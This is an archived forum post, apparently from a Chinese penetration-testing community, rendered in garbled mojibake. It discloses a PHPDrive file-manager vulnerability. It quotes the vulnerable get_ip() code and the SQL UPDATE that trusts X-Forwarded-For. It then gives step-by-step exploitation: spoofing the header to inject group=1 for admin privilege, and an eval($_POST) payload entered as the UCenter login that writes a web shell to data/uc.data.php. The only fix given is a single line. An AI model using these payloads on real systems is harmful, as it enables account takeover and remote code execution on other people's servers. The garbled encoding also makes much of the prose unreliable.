PHPDriveÈ¨ÏÞÌáÉýÂ©¶´

admin ·¢±íÓÚ 2012-12-31 09:18:34

PHPDrive ÊÇÒ»Ì×ÔËÐÐÓÚ PHP »·¾³µÄÎÄ¼þ¹ÜÀíÏµÍ³£¬¿ÉÒÔÓ¦ÓÃÓÚÍøÅÌ¡¢ÆóÒµÎÄ¼þ¹ÜÀí¡¢Ñ§Ð£¡¢ÍÅ¶Ó¹ÜÀí¡¢Èí¼þÕ¾¡¢ÎÄ¼þCMSµÈ

includes/user.lib.php
ÐÐ87
function get_ip() {
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
ÔÚÓÃ»§×¢²áÓëµÇÂ¼ ´¦module/disk/account.lead.php
198ÐÐ
//¸üÐÂ±¾´ÎµÇÂ¼IPºÍÊ±¼ä
$db->Query(¡®UPDATE `¡¯.$db->TPre.¡¯user` SET `before_last_date` = ¡®.$UserArr['last_date'].¡¯,`last_date` = ¡®.$NowUnixTime.¡¯,`before_last_ip` = ¡°¡®.$UserArr['last_ip'].¡¯¡±,`last_ip` = ¡°¡®.get_ip().¡¯¡± WHERE `uid` = ¡®.$UserArr['uid'].¡¯;');//get_ip()Èë¿â×¢Èë²úÉú
ÓÉÓÚ±¾Ì×³ÌÐòuserÓëmanagerÊÇ´æÔÚÓÚÍ¬Ò»¸ö±íÏÂµÄ£¬Ö»ÊÇÓÃgroup×Ö¶ÎÀ´Çø·ÖÁ½Õß,group=1Îª¹ÜÀíÔ±£¬2ÔòÎªÆÕÍ¨ÓÃ»§¡£ËùÒÔ¿ÉÒÔÀûÓÃÒÔÉÏ×¢Èë£¬½«ÆÕÍ¨ÓÃ»§µÄgroupÖµ¸ÄÎª1£¬¼´¿ÉÌáÉýÈ¨ÏÞ
ÊµÏÖ·½·¨£ºÊ¹ÓÃfirefoxµÄÒ»¿î²å¼þx-forwarded-for Header 1.0,½«ÄãµÄIPµØÖ·¸ÄÎª123¡å,`group`=¡±1È»ºóµÇÂ½£¬ÕâÊ±ºòÄã¾ÍÊÇ¹ÜÀíÔ±ÁË.
ºóÌ¨getshell:
ÔÚUCenterÉèÖÃ´¦£¬½«UCÊý¾Ý¿âµÇÂ¼ÃûÌîÐ´Îª

root¡¯);eval($_POST);?>/*
¿ÉÒÔµÃµ½Ò»¸öshell,Î»ÖÃÔÚ data/uc.data.php

ÐÞ¸´£º¹ýÂË×¢Èë

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

PHPDriveÈ¨ÏÞÌáÉýÂ©¶´